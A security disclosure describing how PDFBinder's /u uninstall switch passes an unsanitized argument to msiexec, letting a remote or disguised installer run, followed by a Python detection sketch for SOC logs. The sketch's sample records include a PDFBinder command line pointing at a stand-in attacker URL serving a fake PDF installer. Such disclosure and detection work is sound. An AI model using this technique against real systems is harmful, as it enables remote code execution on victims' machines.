I have some security concerns and tried to reach the author of PDFBinder over a few channels without success, so I am reaching out here. I understand that PDFBinder is not actively maintained anymore. However, it is still being used, including in sensitive fields, which is the reason for my report.
Looking at the code of Program.MainForm.Main(), PDFBinder can be launched from the command line with a /u parameter to uninstall it by providing its product code. However, the second argument is used to start a msiexec subprocess without sanitization.
The lack of parameter sanitization allows sending a path or URL to an arbitrary MSI installer to the msiexec subprocess instead of the product code. The installer is then automatically retrieved and executed. In addition, since msiexec is used, the provided installer does not need to have an MSI or DLL extension. Any extension can be used (PDF for instance), which is illustrated below (victim command line on the left, remote access obtained on the right).

This raises two main concerns.
- Users may be tricked through social engineering into running a malicious installer masquerading as a PDF file.
- From a SOC / Incident Response perspective, detecting such attacks in logs is made harder because the command line used looks relatively legitimate.
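As an added example addressing the second concern (my own detection sketch, not code from the report or from PDFBinder), a SOC can flag process-creation records where PDFBinder.exe was started with /u and the following argument is not a braced product-code GUID, which is the only value that switch should legitimately receive. The record format (`image|command line`), the exact command-line shape, and the sample records are all assumptions constructed for this illustration.

```python
import re
import shlex

# A Windows Installer product code is a braced GUID such as
# {12345678-1234-1234-1234-123456789ABC}; anything else after /u is suspicious.
PRODUCT_CODE_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")

# Constructed sample process-creation records (not real telemetry),
# one "<image>|<command line>" pair per line.
SAMPLE_LOG = """\
C:\\Program Files\\PDFBinder\\PDFBinder.exe|"PDFBinder.exe" /u {ABCDEF01-2345-6789-ABCD-EF0123456789}
C:\\Program Files\\PDFBinder\\PDFBinder.exe|"PDFBinder.exe" /u http://attacker.example/invoice.pdf
C:\\Program Files\\PDFBinder\\PDFBinder.exe|"PDFBinder.exe" /u C:\\Users\\victim\\Downloads\\report.pdf
C:\\Program Files\\PDFBinder\\PDFBinder.exe|"PDFBinder.exe" a.pdf b.pdf
"""


def is_product_code(value: str) -> bool:
    """True only for a braced GUID, the sole legitimate value after /u."""
    return bool(PRODUCT_CODE_RE.match(value))


def uninstall_argument(cmdline: str):
    """Return the token following /u in a PDFBinder command line, or None."""
    # Non-POSIX mode keeps Windows backslashes intact; strip the surrounding quotes.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() == "/u":
            return tokens[i + 1]
    return None


def flag_suspicious(log_text: str):
    """Return (image, cmdline) pairs where PDFBinder's /u value is not a product code."""
    hits = []
    for line in log_text.splitlines():
        image, _, cmdline = line.partition("|")
        if not image.lower().endswith("pdfbinder.exe"):
            continue
        arg = uninstall_argument(cmdline)
        if arg is not None and not is_product_code(arg):
            hits.append((image, cmdline))
    return hits


if __name__ == "__main__":
    for image, cmdline in flag_suspicious(SAMPLE_LOG):
        print("SUSPICIOUS:", cmdline)
```

The same check can be expressed as a SIEM rule on the process command line; the point is to alert on a /u value that is a path or URL rather than a GUID.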